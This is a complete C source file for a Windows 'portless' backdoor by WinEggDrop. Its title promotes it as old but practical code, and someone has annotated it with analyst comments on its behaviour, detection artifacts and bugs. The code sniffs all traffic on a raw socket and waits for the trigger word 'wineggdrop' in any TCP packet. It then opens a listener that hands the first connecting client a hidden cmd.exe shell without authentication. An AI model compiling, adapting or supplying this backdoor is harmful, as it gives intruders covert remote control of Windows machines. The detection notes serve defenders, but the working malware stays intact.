古老的代码,但是绝对实用 一个小后门 WinEggDrop

//**********************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: To Demonstrate Some Portless Backdoor Technique
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)
//
// Analyst summary of what the code below does:
//   1. DoSniffing() opens a raw IP socket, binds it to the host's first
//      address and enables SIO_RCVALL on it, then loops on recv().
//   2. DecodeIPPack()/DecodeTCPPack() look for the literal string
//      "wineggdrop" in the payload of any received TCP segment and keep
//      the sender's address in SourceIPAddress.
//   3. On a match StartBackDoor() binds a TCP listener on BackDoorPort
//      (default 1982) and GetABackDoorShell() bridges the first accepted
//      connection to a hidden cmd.exe via anonymous pipes.
// Observable artifacts for detection: a process owning a raw socket with
// SIO_RCVALL set, the cleartext trigger word on the wire, a listening
// port that only exists after activation, and a cmd.exe child whose
// standard handles are pipes inherited from this process.
//**********************************************************************
#include <windows.h>
#include <stdio.h>
#include <winsock2.h>
// Some Structures To Define
#define   IP_HDRINCL         2          // Not used anywhere in this file; may duplicate the SDK's own definition
#define SIO_RCVALL          _WSAIOW(IOC_VENDOR,1)   // Receive-all ioctl used by DoSniffing()
#define MAX_PACK_LEN     65535          // Size of the raw receive buffer
#define MAX_ADDR_LEN      16            // Room for "255.255.255.255" plus NUL
#define MAX_HOSTNAME_LAN     255
// IPv4 header as read from the raw socket. h_lenver packs version (high
// nibble) and header length in 32-bit words (low nibble); DecodeIPPack()
// only uses the low nibble.
typedef struct _iphdr
{
    unsigned char   h_lenver;
    unsigned char   tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char   ttl;
    unsigned char   proto;
    unsigned short checksum;
    unsigned int    sourceIP;
    unsigned int    destIP;
}IP_HEADER;
// TCP header. th_lenres holds the data offset in its high nibble;
// DecodeTCPPack() shifts it out to find the start of the payload.
typedef struct _tcphdr
{
    USHORT th_sport;
    USHORT th_dport;
    unsigned int   th_seq;
    unsigned int   th_ack;
    unsigned char th_lenres;
    unsigned char th_flag;
    USHORT th_win;
    USHORT th_sum;
    USHORT th_urp;
}TCP_HEADER;
// End Of Structure
// Global Variable
char SourceIPAddress[MAX_ADDR_LEN];     // Dotted-quad source of the last TCP packet seen by DecodeIPPack(); printed on activation
int   BackDoorPort = 0;      // The Port Back Door Will Bind (argv[1] or 1982, set in main)
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL    InitSocket();
BOOL    DoSniffing();
BOOL    DecodeIPPack(const char *Buffer,const int BufferSize);
BOOL    DecodeTCPPack(const char * TCPBuffer,const int BufferSize);
BOOL    IsWin2KOrAbove();
DWORD   WINAPI StartBackDoor(LPVOID Para);
BOOL    GetABackDoorShell(const SOCKET ListenSocket);
BOOL      SendSocket(const SOCKET ClientSocket,const char *Message);
unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize);
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
// Main Function
// Checks the OS, picks the port, starts Winsock and hands off to the
// sniffing loop. Returns -1 on the OS or Winsock check failing, 0 when
// DoSniffing() returns (which only happens on a recv() error).
int main(int argc,char *argv[])
{
if (!IsWin2KOrAbove())     // This System Running This Program Is Not Win 2K Or Above
{
     printf("The Program Must Run Under Win 2k Or Above OS\n");     // Display This Message
     return -1;     // Quit The Program
}
if (argc == 2)       // We Get Argument
     BackDoorPort = atoi(argv[1]);       // Argument One Is The Back Door's Port (atoi: no range or error check)
else     // No Argument
     BackDoorPort = 1982;       // Back Door's Port Will Be Defined On 1982
if (!InitSocket())      // Fail To Initize Socket
{
     printf("Fail To Start Up Winsock\n");     // Display Error Message
     return -1;     // Quit The Program
}
DoSniffing();     // Do Sniffing (blocks for the life of the process)
return 0;      // Quit The Program
}
// End Of Main Function
//-------------------------------------------------------------------------
// Purpose: To Initize Socket
// Return Type: Boolean
// Parameters:   NULL
// Requests Winsock 2.2; never calls WSACleanup anywhere in the file.
//-------------------------------------------------------------------------
BOOL InitSocket()
{
WSADATA data;
WORD ver;
ver = MAKEWORD(2,2);
if (WSAStartup( ver, &data )!= 0 )
{
      return FALSE;
}
return TRUE;
}
// End Of InitSocket Function
//-------------------------------------------------------------------------
// Purpose: To Do None-Driver Sniffing
// Return Type: Boolean
// Parameters:   NULL
// Creates the raw socket, binds it to the first address returned by
// gethostbyname() for the local host name, turns on SIO_RCVALL and then
// loops forever on recv(), handing each packet to DecodeIPPack(). When a
// packet matches, the backdoor thread is started and this loop waits for
// it to finish before sniffing again. Returns FALSE on any setup error,
// TRUE only if recv() fails inside the loop.
// NOTE(review): on Windows a raw socket with SIO_RCVALL normally needs
// administrative rights; this file does not check for them.
//-------------------------------------------------------------------------
BOOL DoSniffing()
{
int Length=0;     // Variable To Hold The Receive Buffer Length
char RecvBuf[MAX_PACK_LEN] = {0};      // Receive Buffer (64 KiB on the stack)
SOCKET SocketRaw = INVALID_SOCKET;     // Raw Socket
SocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP);     // Create A Raw Socket
if (SocketRaw == INVALID_SOCKET)       // Fail To Create A Raw Socket
{
     printf("Fail To Create A Raw Socket\n");     // Display Error Message
     return FALSE;     // Return False
}
char FAR name[MAX_HOSTNAME_LAN];
if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR)       // Fail To Get The Host Name
{
     printf("Fail To Get Host Name\n");     // Display Error Message
     closesocket(SocketRaw);       // Close The Raw Socket Created
     return FALSE;     // Return False
}
// The Below Is The NIC Stuff
struct hostent FAR * pHostent;
// The malloc'd block is overwritten on the next line (leaked) and the
// pointer that is later passed to free() is the one gethostbyname()
// returned, not the allocation. gethostbyname()'s result is also never
// checked for NULL before h_addr_list is read.
pHostent = (struct hostent * )malloc(sizeof(struct hostent));     // Allocate Hostent Buffer
pHostent = gethostbyname(name);
SOCKADDR_IN sa;
sa.sin_family = AF_INET;      // That's Internet Related
sa.sin_port = htons(0);       // Any Port Avariable On The OS
if (pHostent->h_addr_list[0] != 0)     // We Only Check The First NIC
{
     memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length);     // We Use The First NIC As The Sniffing Subject
}
else     // Well,The First NIC Is Not Valid
{
     printf("Get Host By Name Fails\n");       // Display Error Message
     free(pHostent);      // See note above: this is not the malloc'd block
     closesocket(SocketRaw);
     return FALSE;     // Return FALSE;
}
free(pHostent);      // See note above: this is not the malloc'd block
if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR)     // Bind The Raw Socket On The First NIC,But Fails
{
     printf("Fail To Bind\n");     // Display Error Message
     closesocket(SocketRaw);       // Close The Raw Socket
     return FALSE;     // Return False
}
// Forget About The Below A Few Lines,They Are Just A Static Routine To Do The None_Driver Sniffing(Some Sort Of Must-Have Codes)
// SIO_RCVALL with input value 1 asks the stack to deliver all IP traffic
// on the bound interface to this socket. The output buffer (dwBufferLen)
// is not read afterwards.
DWORD dwBufferLen[10] ;
DWORD dwBufferInLen = 1 ;
DWORD dwBytesReturned = 0 ;
if (WSAIoctl(SocketRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR)
{
     closesocket(SocketRaw);
     return FALSE;
}
while(TRUE)       // Sniffing Starts Here With Forever Loop
{
     memset(RecvBuf, 0, sizeof(RecvBuf));      // Reset The Receive Buffer (DecodeTCPPack's strstr() relies on the trailing zeros as a terminator)
     Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0);     // Try To Receive Data
     if (Length == SOCKET_ERROR)      // Get Error As Receiving Data
     {
        printf("Fail To Receive Data\n");      // Display Error Message
        break;      // Leave The Loop
     }
     if (DecodeIPPack(RecvBuf,Length))      // Decode The Buffer Received,And The Active Code Is Found
     {
        printf("Bingo,The BackDoor Is Activated On Port %d\n",BackDoorPort);       //We Are Going To Activate The BackDoor
        DWORD dwThreadID;
        // One backdoor session at a time: the sniffer blocks until the
        // thread returns. The thread handle is never closed, and a NULL
        // return from CreateThread is not checked.
        HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID);     // Create The Back Door Thread
        WaitForSingleObject(BackDoorThread,INFINITE);      // Wait Until The Back Door Ends
     }
}
closesocket(SocketRaw);       // Close The Raw Socket
return TRUE;      // Return
}
// End Of DoSniffing Function
//-------------------------------------------------------------------------
// Purpose: To Decode The IP Packer
// Return Type: Boolean
// Parameters:   1.const char *Buffer    -->The Received Buffer
//               2.Const int BufferSize -->The Received Buffer Size
// Filters for TCP, records the source address in the global
// SourceIPAddress and forwards the segment to DecodeTCPPack().
// BufferSize is never compared with the header lengths, and it is passed
// on unreduced (not minus IPLength).
//-------------------------------------------------------------------------
BOOL DecodeIPPack(const char *Buffer,const int BufferSize)
{
IP_HEADER *pIpheader;      // IP Header
SOCKADDR_IN saSource, saDest;      // saDest is unused
pIpheader = (IP_HEADER *)Buffer;       // Transfer The Buffer Into IP Header Form
int Protocol = pIpheader->proto;       // Get The Protocol
if ((Protocol != IPPROTO_TCP))      // Not TCP Protocol
{
     return FALSE;     // Return False Since We Only Interest In TCP Protocol
}
saSource.sin_addr.s_addr = pIpheader->sourceIP;
strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN);      // Get The Source IP(Important For Doing Reverse Connection)
int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf);     // Header length: low nibble, in 32-bit words
return DecodeTCPPack(Buffer+IPLength, BufferSize);       // Decode TCP Packer
}
// End Of DecodeIPPack Function
//-------------------------------------------------------------------------
// Purpose: To Decode The TCP Packer
// Return Type: Boolean
// Parameters:   1.const char *TCPBuffer   -->The TCP Buffer
//               2.Const int BufferSize    -->The TCP Buffer Size (unused)
// Skips the TCP header and searches the payload for the trigger word
// with strstr(), so the search depends on a NUL somewhere after the
// payload (provided by the memset in DoSniffing, except for a full
// 65535-byte buffer). Any TCP segment carrying the word, to any port,
// activates the backdoor; there is no other authentication.
//-------------------------------------------------------------------------
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize)
{
TCP_HEADER * pTcpHeader;      // TCP Header
int iSourcePort,iDestPort;       // Source Port And DestPort
pTcpHeader = (TCP_HEADER * )TCPBuffer;       // Transfer The Buffer Into TCP Header Form
int TcpHeaderLen =   pTcpHeader->th_lenres>>4;      // Data offset: high nibble, in 32-bit words
TcpHeaderLen *= sizeof(unsigned long);
char * TcpData=TCPBuffer+TcpHeaderLen;       // Get The TCP Data
iSourcePort = ntohs(pTcpHeader->th_sport);      // Get The Source Port
iDestPort = ntohs(pTcpHeader->th_dport);     // Get The Destination Port
if (strstr(TcpData,"wineggdrop")!=NULL)      // If The TCP Data Contains A Word "wineggdrop"(The Active Code),Then Bingo
{
     printf("%s:%d-->Local:%d\r\n",SourceIPAddress,iSourcePort,iDestPort);      // Display A Message
     return TRUE;      // Return TRUE(The Back Door Will Be Activated Soon)
}
return FALSE;     // We Didn't Receive An Active Code,Return False
}
// End Of DecodeTCPPack Function
//-------------------------------------------------------------------------
// Purpose: To Check The OS
// Return Type: Boolean
// Parameters:   NULL
// Despite the name, this accepts only NT 5.x (dwMajorVersion == 5);
// later major versions return FALSE.
//-------------------------------------------------------------------------
BOOL IsWin2KOrAbove()
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx(&OSVersionInfo))      // Get The OS Version
      return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) && (OSVersionInfo.dwMajorVersion == 5)); // NT family with major version exactly 5
else
     return FALSE;     // Fail To Get The OS Version,Just Return FALSE
}
// End Of IsWin2KOrAbove Function
//--------------------------------------------------------------------------------
// Purpose: To Ease The Way To Send Data Through Socket
// Return Type: Boolean
// Parameters:   1.const SOCKET ClientSocket     --> The Socket To Send Message
//               2.const char *Message           --> Message To Send
// Sends the NUL-terminated message in one send() call; a short send is
// still reported as success.
//--------------------------------------------------------------------------------
BOOL SendSocket(const SOCKET ClientSocket,const char *Message)
{
return (send(ClientSocket,Message,strlen(Message),0)!=SOCKET_ERROR);
}
// End Of SendSocket
//--------------------------------------------------------------------------------
// Purpose: To Start The Back Door
// Return Type: DWORD
// Parameters:   LPVOID Para     --> Can Be AnyThing (unused)
// Thread entry. Binds a TCP listener on INADDR_ANY:BackDoorPort, accepts
// exactly one connection, runs GetABackDoorShell() on it and then closes
// both sockets, so the port disappears again when the session ends.
// NOTE(review): bind()/listen() return an int that is compared with
// INVALID_SOCKET rather than SOCKET_ERROR.
//--------------------------------------------------------------------------------
DWORD WINAPI StartBackDoor(LPVOID Para)
{
struct sockaddr_in srv;
SOCKET ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);     // Create A TCP Socket
if (ListenSocket == INVALID_SOCKET)       // Fail To Create A TCP Socket
{
     printf("Fail To Create A BackDoor Socket\n");      // Display Error Message
     return -1;     // Return
}
srv.sin_family = AF_INET;     // Internet Related
srv.sin_addr.s_addr = htonl(INADDR_ANY);     // Any Address
srv.sin_port = htons(BackDoorPort);       // Back Door Port
if (bind(ListenSocket,(const struct sockaddr *) &srv,sizeof(srv)) == INVALID_SOCKET)      // Fail To Bind The Socket
{
     printf("Fail To Bind BackDoor Sokcet\n");       // Display Error Message
     closesocket(ListenSocket);      // Close The Socket
     return -1;     // Return
}
if (listen(ListenSocket,1) == INVALID_SOCKET)      // Fail To Listen On The Back Door's Port
{
      printf("Fail To Listen\n");     // Display Error Message
      closesocket(ListenSocket);      // Close The Socket
     return -1;     // Return
}
SOCKET AcceptSocket = accept(ListenSocket, NULL,NULL);      // Accepting Connections (blocks; peer address is discarded)
if (AcceptSocket == INVALID_SOCKET)       // Fail To Accept Connection
{
     printf("Fail To Accept Connection\n");       // Display Error Message
     closesocket(ListenSocket);       // Close The Socket
     return -1;     // Return
}
GetABackDoorShell(AcceptSocket);       // Get A CMD Shell
closesocket(AcceptSocket);       // Close Accpeted Socket
closesocket(ListenSocket);       // Close The Listen Socket
return 0;      // Return
}
// End Of StartBackDoor Function
//--------------------------------------------------------------------------------
// Purpose: To To The Shell Stuff
// Return Type: Boolean
// Parameters:   const SOCKET ListenSocket    --> The Client Connected Socket
// Spawns <system directory>\cmd.exe with a hidden window and its stdin,
// stdout and stderr redirected to two anonymous pipes, then alternates
// between forwarding pending cmd output to the socket and reading one
// line from the socket into cmd's stdin. Ends on an I/O error or when the
// client sends "exit" (case-insensitive). Returns FALSE only if the
// system directory lookup fails; every other exit path returns TRUE.
// The cmd.exe process and thread handles in pi are never closed and the
// child is not terminated here.
//--------------------------------------------------------------------------------
BOOL GetABackDoorShell(const SOCKET ListenSocket)
{
char ReceiveBuffer[MAX_PATH + 1];      // Holds the cmd.exe path first, then client input lines
char SendBuffer[1024 * 4];       // The Send Buffer
unsigned long OutputLength,InputLength;      // The Input And Output Length
// The Pipe And Some Other Sutff
HANDLE ClientReadPipe = NULL;
HANDLE ClientWritePipe = NULL;
HANDLE CmdWritePipe = NULL;
HANDLE CmdReadPipe = NULL;
SECURITY_ATTRIBUTES sa                  = {0};
STARTUPINFO          si                  = {0};
PROCESS_INFORMATION pi                  = {0};
ZeroMemory(ReceiveBuffer,sizeof(ReceiveBuffer));
if (GetSystemDirectory(ReceiveBuffer,MAX_PATH))       // Get System Directory
{
     strcat(ReceiveBuffer,"\\cmd.exe");     // Get The Cmd.exe Full Path (unbounded append into a MAX_PATH+1 buffer)
}
else     // Fail To Get System Directory
{
     SendSocket(ListenSocket,"Fail To Get System Diretory\r\n");       // Display Error Message
     return FALSE;     // Return
}
// Initize The Stuff
sa.nLength = sizeof(sa);
sa.bInheritHandle = TRUE;      // Both ends of each pipe are inheritable, so cmd.exe receives all four handles
sa.lpSecurityDescriptor = NULL;
memset(&pi,0,sizeof(pi));
if (!CreatePipe(&ClientReadPipe,&CmdWritePipe,&sa,0))       // Fail To Create Client Read Pipe
{
     SendSocket(ListenSocket,"Fail To Create Client Read Pipe\r\n");      // Display Error Message
     goto CleanUP;     // Leave
}
if (!CreatePipe(&CmdReadPipe,&ClientWritePipe,&sa,0))       // Fail To Create Cmd Read Pipe
{
     SendSocket(ListenSocket,"Fail To Create CMD Read Pipe\r\n");      // Display Error Message
     goto CleanUP;     // Leave
}
// Reset And Initize Stuff
memset((void *)&si,0,sizeof(si));
memset((void *)&pi,0,sizeof(pi));
si.cb = sizeof(si);
si.dwFlags      = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = CmdReadPipe;      // Pass The CmdReadPipe To StdInput
si.hStdError = CmdWritePipe;     // Pass The CmdWritePipe To StdError
si.hStdOutput = CmdWritePipe;       // Pass The CmdWritePipe To StdOutput
if (!CreateProcess(ReceiveBuffer,NULL,NULL,NULL,1,0,NULL, NULL,&si,&pi))      // bInheritHandles=1: the child gets the pipe handles
{
     SendSocket(ListenSocket,"Fail To Create Process\r\n");      // Display Error Message
     goto CleanUP;     // Leave
}
while(TRUE)       // Shell Commincation Starts Here
{
     if (!PeekNamedPipe(ClientReadPipe,SendBuffer,sizeof(SendBuffer),&OutputLength,NULL,NULL))       // Fail To Get Data From The Pipe
     {
        SendSocket(ListenSocket,"Fail To Peek Name Pipe\r\n");      // Display Error Message
        break;       // Leave
     }
     if (OutputLength > 0)     // cmd has produced output: drain it to the client
     {
        ZeroMemory(SendBuffer,sizeof(SendBuffer));      // Reset The Send Buffer
        if (!ReadFile(ClientReadPipe,SendBuffer,OutputLength,&OutputLength,0))      //Fail To Read The Data
        {
           SendSocket(ListenSocket,"Fail To Read File\r\n");     // Display Error Message
           break;      // Leave
        }
        if (send(ListenSocket,SendBuffer,OutputLength,0) == SOCKET_ERROR)     // Fail To Send The Data
        {
           printf("Fail To Send Buffer\n");       // Display Error Message
           break;      // Leave
        }
     }
     else     // No pending output: block on the socket for the next client line
     {
        ZeroMemory(ReceiveBuffer,sizeof(ReceiveBuffer));      // Reset Receive Buffer
        InputLength = ReceiveMessageFromSocket(ListenSocket, ReceiveBuffer, sizeof(ReceiveBuffer));     // Receive Input From Client
        if (InputLength == SOCKET_ERROR)       // Fail To Receive Data
        {
           printf("Fail To Receive Buffer\n");       // Display Error Message
           break;      // Leave
        }
        if (!WriteFile(ClientWritePipe,ReceiveBuffer,InputLength,&InputLength,0))      // Fail To Write The Received Data To The Pipe
        {
           printf("Fail To Write File\n");     // Display Error Message
           break;      // Leave
        }
        // Leave The Shell (the "exit" line has already been written to cmd's stdin above)
        if (strnicmp((char*)ReceiveBuffer, "exit\r\n", 6) == 0 || strnicmp((char*)ReceiveBuffer, "exit\r", 5)==0 || strnicmp((char*)ReceiveBuffer, "exit\n", 5)==0)
          break;
     }
}
// Clean All Resource Allocated (pipe handles only; pi.hProcess/pi.hThread are left open)
CleanUP:
       if (CmdReadPipe != NULL)
            CloseHandle(CmdReadPipe);
       if (CmdWritePipe != NULL)
            CloseHandle(CmdWritePipe);
       if (ClientReadPipe != NULL)
            CloseHandle(ClientReadPipe);
       if (ClientWritePipe)
            CloseHandle(ClientWritePipe);
   return TRUE;
}
// End Of GetABackDoorShell Function
//--------------------------------------------------------------------------------
// Purpose: To Receive Data From Socket In A Custom-Defined Way
// Return Type: unsigned int
// Parameters: 1.const SOCKET ClientSocket    --> The Client Connected Socket
//              2.char *Buffer                 --> Buffer To Hold Data Received
//              3.const int BufferSize         --> The Buffer Size
// Reads one byte at a time until '\n' or the buffer is full, treating
// '\b' as a backspace over the previous byte. Returns the byte count,
// 0 for BufferSize < 2, or SOCKET_ERROR (converted to unsigned) when
// recv() fails. A recv() return of 0 (peer closed) is not distinguished
// from data, so a disconnect keeps looping, filling the buffer with
// zero bytes, until it is full.
//--------------------------------------------------------------------------------
unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize)
{
ZeroMemory(Buffer,BufferSize);      // Reset The Buffer
if (BufferSize < 2)     // Buffer Size Is Less Then 2
{
      return 0;     // Dump
}
unsigned int CharacterCount = 0;
while(TRUE)
{
     if (CharacterCount >= BufferSize)      // Buffer full: overwrite the last two bytes with a line end and return
     {
        // Give The Buffer An Enter
        Buffer[BufferSize-2] = '\r';
        Buffer[BufferSize-1] = '\n';
        return CharacterCount;      // Return The Characters Received
     }
     if (recv(ClientSocket,Buffer+CharacterCount,1,0) == SOCKET_ERROR)      // Fail To Receive Data
     {
        return SOCKET_ERROR;       // Return Error
     }
     if (Buffer[CharacterCount] == '\b')      // Back Space Detected
     {
        Buffer[CharacterCount] = '\0';      // Skip It
        if (CharacterCount > 0)     // Characters Received Is Bigger Than 0
        {
           CharacterCount--;       // Decrease One Character
           Buffer[CharacterCount] = '\0';
        }
        continue;       // Begin A New Loop
     }
     if (Buffer[CharacterCount++] == '\n')       // Enter Is Detected
     {
        return CharacterCount;     // Return The Characters Received
     }
}
return 0;      // Unreachable: every exit from the loop above returns
}
// End Of ReceiveMessageFromSocket Function
// End Of File
